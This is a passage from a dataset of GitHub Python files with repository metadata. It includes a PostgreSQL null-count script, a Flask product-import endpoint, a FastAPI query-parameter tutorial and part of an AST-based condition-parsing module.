{"api_name": "doit.support.utils.Collection", "line_number": 514, "usage_type": "name"}, {"api_name": "unittest.TestSuite", "line_number": 519, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 520, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 521, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 522, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 523, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 524, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 525, "usage_type": "call"}]} +{"seq_id": "19232783049", "text": "import psycopg2\nimport logging\nimport os\nfrom time import time\nimport csv\n\n\ndef create_csv(filename):\n if os.path.isfile(filename):\n print('Result file already exist')\n else:\n print('Creating result file')\n with open(filename, 'w+') as myfile:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow((\"Column\", \"Not Null\", \"Not_Null %\"))\n\n\ndef save_csv(main_data, filename):\n with open(filename, 'a') as myfile:\n try:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow(main_data)\n except:\n print('Error while adding new line')\n\n\ndef queries():\n \"\"\"\n Choose your destiny\n :return: all chosen queries you want\n \"\"\"\n query_col_name1 = \"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '\"\n query_col_name2 = \"' ORDER BY ORDINAL_POSITION\"\n query_count1 = \"SELECT COUNT(*) FROM \"\n query_count2 = \" is not null\"\n select_query = \"SELECT * FROM \"\n set_schema = \"SET search_path TO rocket_data_raw\"\n set_role = \"SET role employees\"\n return query_col_name1, query_col_name2, query_count1, query_count2\n\n\ndef close_con(con_cursor, con_connection):\n con_cursor.close()\n con_connection.close()\n print(\"PostgreSQL connection is closed\")\n\n\ndef manage_connection():\n pg_user = 'urs'\n pg_password = 'urs'\n pg_host = 'urs'\n pg_port = 'urs'\n db_name = 'urs'\n schema = 'urs'\n con = psycopg2.connect(user=pg_user, password=pg_password, host=pg_host, port=pg_port, database=db_name)\n main_cursor = con.cursor()\n return con, main_cursor\n\n\ndef do_query(cursor, table, total, output):\n print(\"\\nChecking the '\" + table + \"' table ...\")\n q1, q2, q3, q4 = queries()\n column_name_query = q1 + table + q2\n cursor.execute(column_name_query)\n raw = cursor.fetchall()\n\n cols = [x[0] for x in raw]\n for c in cols:\n print(\"- Checking column '\" + c + \"' ...\")\n not_null_query = q3 + table + ' WHERE ' + c + q4\n # not null values count\n cursor.execute(not_null_query)\n nulls = cursor.fetchone()[0]\n\n # log and append result in csv\n null_percent = \"{: 10.2f}\".format(nulls / total * 100)\n save_csv([c, nulls, null_percent + '%'], output, )\n print(\"--> Not null values \" + c + \": \" + \"{:,}\".format(nulls) + '/' + \"{:,}\".format(total) + ' | ' + null_percent + ' %\\n')\n\n\ndef execute():\n try:\n # tables in 'rocket_raw' schema with total row count\n # Note - you can decide to query every table total count if you decide but i didnt. 
i explicitly hard coded it :)\n tables = {'Employee1': 49937443, 'Employee2': 161776046, 'Employee3': 55300300, 'Employee4': 228049317, 'Employee5': 190534019,\n 'Employee6': 146851802}\n\n connection, cursor = manage_connection()\n if connection:\n print(\"\\n ---------------------------------------- Connection opened for ------------------------------------------------------- \\n\")\n print(connection.get_dsn_parameters(), \"\\n\")\n cursor.execute(\"SELECT version();\")\n record = cursor.fetchall()\n print(\"You are connected to - \", record, \"\\n\")\n\n # Operation starts now -----------------------------------------------------------------------------------------------------------\n # *****************************************************\n # SET UR SEARCH PATH TO YOUR SCHEMA HERE\n # *****************************************************\n cursor.execute(\"SET search_path TO ************UR SCHEMA********************\")\n for table, total in tables.items():\n filename = os.getcwd() + os.sep + 'Output' + os.sep + 'File_' + table + '.csv'\n print(filename)\n create_csv(filename)\n do_query(cursor, table, total, filename)\n close_con(cursor, connection)\n\n except psycopg2.DatabaseError as db_error:\n print(\"Error while connecting to PostgreSQL \", db_error)\n pass\n\n\nstart = time()\nexecute()\nend = time()\nprint(\"TIme {}'s\".format(end - start))\n", "repo_name": "pesto93/Postgres-with-python", "sub_path": "Sql_counts.py", "file_name": "Sql_counts.py", "file_ext": "py", "file_size_in_byte": 4192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 102, "usage_type": "attribute"}, {"api_name": "psycopg2.DatabaseError", "line_number": 108, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "time.time", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "37861589923", "text": "import datetime\nfrom db import db\nfrom components.schemas.ShopUnitImport import ShopUnitImport\nfrom components.schemas.ShopUnit import ShopUnit\nfrom components.schemas.ShopUnitType import ShopUnitType\nfrom components.schemas.ShopUnitStatistic import ShopUnitStatistic\nfrom components.schemas.ShopUnitImportRequest import ShopUnitImportRequest\nfrom flask import request\nfrom my_logs.logg import info_log, warning_log\nfrom .base_function import delete_child, response_error_400, TIME_FORMAT\nfrom flask import Blueprint\n\n\nbp_imports = Blueprint('imports', __name__)\n\n\n\n\ndef valid_request_json(data: dict, time_format: str) -> bool:\n '''\n Проверка форматы даты и основной структуры\n '''\n\n if 'items' not in data or 'updateDate' not in data or len(data) != 2:\n info_log.warning('POST:/imports Проблемы с общей структурой входных данных')\n warning_log.warning(\n f'POST:/imports Проблемы с общей структурой входных данных:\\ndata={data}\\n, 400')\n return False\n\n try:\n datetime.datetime.strptime(data['updateDate'], time_format)\n return True\n except ValueError:\n info_log.warning(f'POST:/imports Проблемы с форматом даты')\n 
warning_log.warning(\n f'POST:/imports Проблемы с форматом даты:\\ndata={data}\\n, 400')\n return False\n\n\ndef is_category(node_id: object) -> bool:\n if node_id is None:\n return True\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n category = node.type\n return category == 'CATEGORY'\n return True\n\n\ndef valid_structure_item(item: dict) -> bool:\n '''\n Проверяем все ли необходимые параметры нам передали.\n '''\n if item['type'] in ['CATEGORY', 'OFFER']:\n if all(key in item for key in ['id', 'name', 'type']) and item['name'] is not None:\n return True\n info_log.warning('POST:/imports Проблемы с отдельной структурой item')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item:\\nitem={item}\\n, 400')\n return False\n\n\ndef valid_item(item: dict) -> bool:\n '''\n Проверка: Дочерние эл-ты могут быть только у CATEGORY\n '''\n parent_id = value_or_none(dict_=item, key_='parentId')\n price = value_or_none(dict_=item, key_='price')\n if not is_category(parent_id):\n info_log.warning(f'POST:/imports родителем может быть только категория')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (parent_id) :\\nitem={item}\\n, 400')\n return False\n if price is not None and price < 0:\n info_log.warning(f'POST:/imports цена должна быть больше 0')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (price) :\\nitem={item}\\n, 400')\n return False\n return True\n\n\ndef value_or_none(dict_: dict, key_: str) -> object:\n if key_ in dict_:\n return dict_[key_]\n return None\n\n\ndef add_child(id_child: str, id_parent: object) -> None:\n '''\n У узла id_parent появился дочерний эл-т id_child\n '''\n parent = ShopUnit.query.filter_by(id=id_parent).first()\n if id_child != id_parent: # проверяем на циклы\n if parent is not None: # если это корень, то пропускаем шаг\n if parent.children is not None:\n parent.children = set(list(parent.children) + [id_child])\n else:\n parent.children = [id_child]\n\n\ndef check_type_context(type: str, price: object) -> bool:\n '''\n Проверка параметров, зависящих от типа\n '''\n if type == 'CATEGORY':\n if price is not None:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n if type == 'OFFER':\n if price is None or price < 0:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n\n return True\n\n\ndef save_statistic(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Фиксируем любое изменение для статистики\n '''\n\n problem = ShopUnitStatistic.query.filter_by(id=node_id).filter_by(date=time_).first()\n if problem is None:\n new_node = ShopUnitStatistic(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n new_node.price = price\n db.session.add(new_node)\n else:\n info_log.info('поле updateDate монотонно возрастает по условию')\n\n\ndef add_node(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Функция добавления новой записи по id\n '''\n new_node = ShopUnit(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n add_child(id_child=node_id, id_parent=parentId)\n new_node.price = price\n if type_ == 'CATEGORY':\n new_node.children = []\n db.session.add(new_node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, 
type_, price, time_)\n\n info_log.info(f'POST:/imports Новый обьект id={node_id}, 200')\n\n\n\n\ndef update_date_parent(node_id: object, time_update: datetime) -> None:\n '''\n Функция обновления даты по id родителя\n '''\n if node_id is None:\n return\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n node.date = time_update\n db.session.add(node)\n save_statistic(node_id=node.id, parentId=node.parentId, name=node.name, type_=node.type, price=node.price,\n time_=time_update)\n update_date_parent(node_id=node.parentId, time_update=time_update)\n\n\ndef save_import_fact(node_id: str, name: str, parentId: object, type: str, price: object) -> None:\n '''\n Фиксируем факт импорта\n '''\n unit_import = ShopUnitImport.query.filter_by(id=node_id).first()\n if unit_import is None:\n unit_import = ShopUnitImport(id=node_id, name=name, type=type)\n unit_import.name = name\n unit_import.parentId = parentId\n unit_import.type = type\n unit_import.price = price\n db.session.add(unit_import)\n\n\ndef save_request_fact(ids: set, update_date: datetime):\n '''\n Фиксируем факт отправки\n '''\n new_import_request = ShopUnitImportRequest()\n new_import_request.items = list(ids)\n new_import_request.updateDate = update_date\n db.session.add(new_import_request)\n\n\ndef update_node(node_id: str, old_parentId: object, parentId: object, name: str, type_: str, price: object,\n time_: datetime) -> None:\n '''\n Обновление значений записи в бд по id\n '''\n node = ShopUnit.query.filter_by(id=node_id).first()\n node.parentId = parentId\n delete_child(id_child=node_id, id_parent=old_parentId) #удаляем ребенка у старого родителя\n add_child(id_child=node_id, id_parent=parentId) #добавляем ребенка новому родителю\n node.name = name\n node.type = type_\n node.price = price\n node.date = time_\n db.session.add(node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, type_, price, time_)\n\n info_log.info(\n f'POST:/imports Обновление обьекта id={node_id} name={name}, price={price}, date={time_} ch={node.children}, 200')\n\n\n\ndef id_duplicate(ids: set, new_id: str) -> bool:\n '''\n Проверка на наличие дубликатов id.\n ids - множество всех id в текущем запросе\n '''\n if new_id not in ids:\n ids.add(new_id)\n return False\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов id={ids} + {new_id}, 400', )\n return True\n\n\ndef main_handler_item(item: dict, update_date: datetime) -> int:\n '''\n Основная функция обработки валидной item и валидной update_date\n '''\n new_parent_id = value_or_none(dict_=item, key_='parentId')\n new_price = value_or_none(dict_=item, key_='price')\n\n node = ShopUnit.query.filter_by(id=item['id']).first()\n type_obj = ShopUnitType.query.filter_by(type=item['type']).first()\n new_type = type_obj.type\n\n if not check_type_context(type_obj.type, new_price):\n return response_error_400()\n\n if node is not None:\n # Если уже есть в базе такой id, значения нужно обновить запись\n if node.type != new_type:\n return 400\n old_parent_id = node.parentId\n update_node(node_id=item['id'], parentId=new_parent_id, name=item['name'],\n type_=new_type, price=new_price, time_=update_date, old_parentId=old_parent_id, )\n if old_parent_id is not None:\n #обновляем старого родителя (время)\n update_date_parent(old_parent_id, time_update=update_date)\n else:\n # иначе создаем новую запись\n add_node(node_id=item['id'], parentId=new_parent_id, name=item['name'], type_=new_type,\n price=new_price, 
time_=update_date)\n\n if new_parent_id is not None:\n # обновляем нового родителя (время)\n update_date_parent(new_parent_id, time_update=update_date)\n return 200\n\n\n@bp_imports.route('/imports', methods=['POST'])\ndef imports():\n '''\n Обработчик для импортирования новых товаров и/или категорий.\n '''\n\n info_log.info('handler:POST:/imports ')\n if not request.is_json:\n info_log.warning(f'handler:POST:/imports это не json')\n return response_error_400()\n\n data = request.get_json()\n\n if not valid_request_json(data, TIME_FORMAT):\n return response_error_400()\n\n update_date = datetime.datetime.strptime(data['updateDate'], TIME_FORMAT)\n update_date = update_date.isoformat()\n\n ids = set()\n for item in data['items']:\n if (not valid_structure_item(item)) or (not valid_item(item)) or (id_duplicate(ids, item['id'])):\n return response_error_400()\n if main_handler_item(item=item, update_date=update_date) != 200:\n info_log.warning('handler:POST:/imports Нельзя менять типы')\n return response_error_400()\n\n save_request_fact(ids, update_date)\n db.session.commit()\n return '', 200\n", "repo_name": "Alset-Nikolas/RestApiServis", "sub_path": "app/paths/imports.py", "file_name": "imports.py", "file_ext": "py", "file_size_in_byte": 11369, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 14, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 25, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 25, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 26, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 34, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 34, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 35, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 35, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 43, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 43, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 43, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 57, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 57, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 58, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 58, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 70, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 70, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 71, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 71, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 75, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 75, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 76, "usage_type": 
"call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 76, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 92, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 92, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 92, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 107, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 107, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 112, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 112, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query.filter_by", "line_number": 124, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query", "line_number": 124, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 124, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 126, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 129, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 129, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 129, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 131, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 131, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 138, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 144, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 144, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 144, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 149, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 149, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 160, "usage_type": "name"}, {"api_name": "db.db.session.add", "line_number": 163, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 163, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 163, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query.filter_by", "line_number": 173, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query", "line_number": 173, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 173, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 175, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 180, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 180, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 180, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImportRequest.ShopUnitImportRequest", "line_number": 187, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 190, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 
190, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 190, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 198, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 198, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 198, "usage_type": "name"}, {"api_name": "base_function.delete_child", "line_number": 200, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 206, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 206, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 206, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 211, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 211, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 224, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 224, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 236, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 236, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 236, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query.filter_by", "line_number": 237, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query", "line_number": 237, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType", "line_number": 237, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 241, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 270, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 270, "usage_type": "name"}, {"api_name": "flask.request.is_json", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 272, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 272, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 273, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 277, "usage_type": "argument"}, {"api_name": "base_function.response_error_400", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 280, "usage_type": "call"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 280, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "base_function.response_error_400", "line_number": 286, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 288, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 288, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 289, "usage_type": "call"}, {"api_name": "db.db.session.commit", "line_number": 292, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 292, "usage_type": 
"name"}]} +{"seq_id": "11443707863", "text": "'''\n _oo0oo_\n o8888888o\n 88\" . \"88\n (| -_- |)\n 0\\ = /0\n ___/`---'\\___\n .' \\\\| |// '.\n / \\\\||| : |||// \\\n / _||||| -:- |||||- \\\n | | \\\\\\ - /// | |\n | \\_| ''\\---/'' |_/ |\n \\ .-\\__ '-' ___/-. /\n ___'. .' /--.--\\ `. .'___\n .\"\" '< `.___\\_<|>_/___.' >' \"\".\n | | : `- \\`.;`\\ _ /`;.`/ - ` : | |\n \\ \\ `_. \\_ __\\ /__ _/ .-` / /\n =====`-.____`.___ \\_____/___.-`___.-'=====\n `=---='\n\n\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n 佛祖保佑 永不宕机 永无BUG\n'''\n# -*- coding: utf-8 -*-\n# @Project : FastAPIBook\n# @File Name : 8_query_parameters.py\n# @Author : liushuangdan \n# @Date : 2020/7/17 16:16\n# @IDE : PyCharm\nfrom fastapi import FastAPI\n\n\napp = FastAPI()\nfake_item_db = [{\"item_name\": \"Foo\"}, {\"item_name\": \"Bar\"}, {\"item_name\": \"Baz\"}]\n\n\n@app.get(\"/items\")\nasync def read_item(skip: int = 0, limit: int = 10):\n '''\n @description: \n @param {type} \n @return: \n ''' \n return fake_item_db[skip : skip + limit]\n\n\n@app.get(\"/i/\")\nasync def i(A: str = \"HI...\", B: str = \"Hello, jack\", C: str = \"He..\"):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"ii\")\nasync def ii(A: int = 0, B: int = 10, C: int = 20):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"iii\")\nasync def iii(A: int = 0, B: int = 10, C: int = 20):\n return \"A+B+C\", A+B+C\n\n\n# bool 类型强制转换\n@app.get(\"/xxx/{item_id}\")\nasync def xxx(item_id: str, QQ: str = None, SS: bool = False):\n '''\n @description: \n @param {type}:\n QQ 为 选填参数。\n item_id 为必填参数。\n SS: 为选填参数。 \n @return: \n '''\n item = {\"item_id\": item_id}\n if QQ:\n item.update(\n {\"QQ\": QQ}\n )\n if not SS:\n item.update(\n {\"item_id\": \"This is SSSSSSS(n个s)\"}\n )\n return item\n\n\n# 多路径 和 查询参数 和 必填字段\n@app.get(\"/user/{user_id}/item/{item_id}\")\nasync def read_user_item(\n user_id: int, item_id: str, q: str = None, short: bool = False\n):\n item = {\"item_id\": item_id, \"owner_id\": user_id}\n if q:\n item.update(\n {\"q\": q}\n )\n if not short:\n item.update(\n {\"description\": \"This is an amazing item that has a long description\"}\n )\n return item \n\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n\n", "repo_name": "liushuangdan/FastAPIStudy", "sub_path": "src/FastAPIBook/step2_api/8_query_parameters.py", "file_name": "8_query_parameters.py", "file_ext": "py", "file_size_in_byte": 2677, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.FastAPI", "line_number": 35, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "15515001302", "text": "from __future__ import annotations\n\nimport ast\nimport inspect\nfrom dataclasses import dataclass\nfrom enum import Enum, auto\nfrom functools import reduce\nfrom typing import Any, Callable, Sequence, cast\n\nfrom .instrumentation import variable_name\nfrom .kripke import Kripke, State\n\n\nclass Comparison(Enum):\n \"\"\"Representation of the comparison operators <=, >=\n\n This class is confined to the operators that include equality because they are the easiest to\n support as STL formulas.\n\n Attributes:\n LTE: less than or equal to operator\n GTE: greater than or equal to operator\n \"\"\"\n\n LTE = auto()\n GTE = auto()\n\n def inverse(self) -> Comparison:\n \"\"\"Invert the comparion.\n\n Returns:\n The inverse comparison operator\n \"\"\"\n\n if self is Comparison.LTE:\n return 
Comparison.GTE\n\n if self is Comparison.GTE:\n return Comparison.LTE\n\n raise ValueError(f\"Unknown comparison type {self}\")\n\n @staticmethod\n def from_op(node: ast.cmpop) -> Comparison:\n \"\"\"Create a comparison from an AST node.\n\n Args:\n op: The AST comparison operator node\n\n Returns:\n The comparison operator of the node\n\n Raises:\n TypeError: If op is not an AST comparison node\n \"\"\"\n\n if isinstance(node, ast.LtE):\n return Comparison.LTE\n\n if isinstance(node, ast.GtE):\n return Comparison.GTE\n\n raise TypeError(f\"Unsupported comparison operator {node}\")\n\n\nclass InvalidConditionExpression(Exception):\n # pylint: disable=C0115\n pass\n\n\ndef _cmp_nonstrict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left <= right\n\n if cmp is Comparison.GTE:\n return left >= right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\ndef _cmp_strict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left < right\n\n if cmp is Comparison.GTE:\n return left > right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\n@dataclass\nclass Condition:\n \"\"\"Representation of the boolean expression of a conditional statement.\n\n This representation assumes that the condition is represented as an inequality, with a variable\n on at least one side of the equation.\n\n Attributes:\n variable: The name of the variable on the left side of the comparison\n comparison: The comparison operator\n bound: The value or variable on the right side of the comparison\n strict: Whether the inequality is strict (<, >) or nonstrict (<=,>=)\n\n \"\"\"\n\n variable: str\n comparison: Comparison\n bound: str | float\n strict: bool = False\n\n def inverse(self) -> Condition:\n \"\"\"Invert the condition.\n\n If the condition is nonstrict, its inverse will be strict and vice versa. This function\n returns a new Condition instance rather than modifying the existing one.\n\n Returns:\n A new Condition with the comparison inverted\n \"\"\"\n return Condition(self.variable, self.comparison.inverse(), self.bound, not self.strict)\n\n def is_true(self, variables: dict[str, float]) -> bool:\n \"\"\"Check if a condition is true given a set of variables.\n\n If a variable is not present in the map, then the condition is assumed to be false.\n\n Args:\n variables: Mapping from variable names to values\n\n Returns:\n True if the condition is true, False otherwise\n\n Raises:\n ValueError: If the value in the comparison attribute is not the Comparison type\n \"\"\"\n\n try:\n left = variables[self.variable]\n except KeyError:\n return False\n\n try:\n right = variables[self.bound] if isinstance(self.bound, str) else self.bound\n except KeyError:\n return False\n\n if self.strict:\n return _cmp_strict(left, self.comparison, right)\n\n return _cmp_nonstrict(left, self.comparison, right)\n\n @property\n def variables(self) -> set[str]:\n \"\"\"The set of variables depended on by the condition.\"\"\"\n\n if isinstance(self.bound, str):\n return {self.variable, self.bound}\n\n return {self.variable}\n\n @classmethod\n def from_expr(cls, expr: ast.expr) -> Condition:\n \"\"\"Create a Condition from an AST expression node.\n\n This class method assumes that the comparison expression only has a single operand. 
This is\n not always the case in Python as the expression \"10 <= x <= 20\" is a valid comparison and\n is represented by having several operands in the expression AST node.\n\n Args:\n expr: The AST expression node\n\n Returns:\n A Condition instance representing the AST comparison expression\n\n Raises:\n InvalidConditionExpresssion: If the expr value is not an ast.Compare type\n TypeErrror: If the expression does not conform to the condition assumptions\n \"\"\"\n\n if not isinstance(expr, ast.Compare):\n raise InvalidConditionExpression(f\"Unsupported expression type {type(expr)}\")\n\n left = expr.left\n comparison = Comparison.from_op(expr.ops[0])\n right = expr.comparators[0]\n variable_nodes = (ast.Name, ast.Attribute)\n\n if isinstance(left, variable_nodes) and isinstance(right, variable_nodes + (ast.Constant,)):\n if isinstance(right, variable_nodes):\n return cls(variable_name(left), comparison, variable_name(right))\n\n if isinstance(right, ast.Constant) and isinstance(right.value, (int, float)):\n return cls(variable_name(left), comparison, float(right.value))\n\n raise TypeError(f\"Invalid bound type {type(right)}\")\n\n if isinstance(left, ast.Constant) and isinstance(right, variable_nodes):\n if not isinstance(left.value, (int, float)):\n raise TypeError(f\"Invalid bound type {type(right)}\")\n\n return cls(variable_name(right), comparison.inverse(), float(left.value))\n\n raise TypeError(\"Invalid comparison expression\")\n\n @classmethod\n def lt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n return cls(variable, Comparison.LTE, bound, 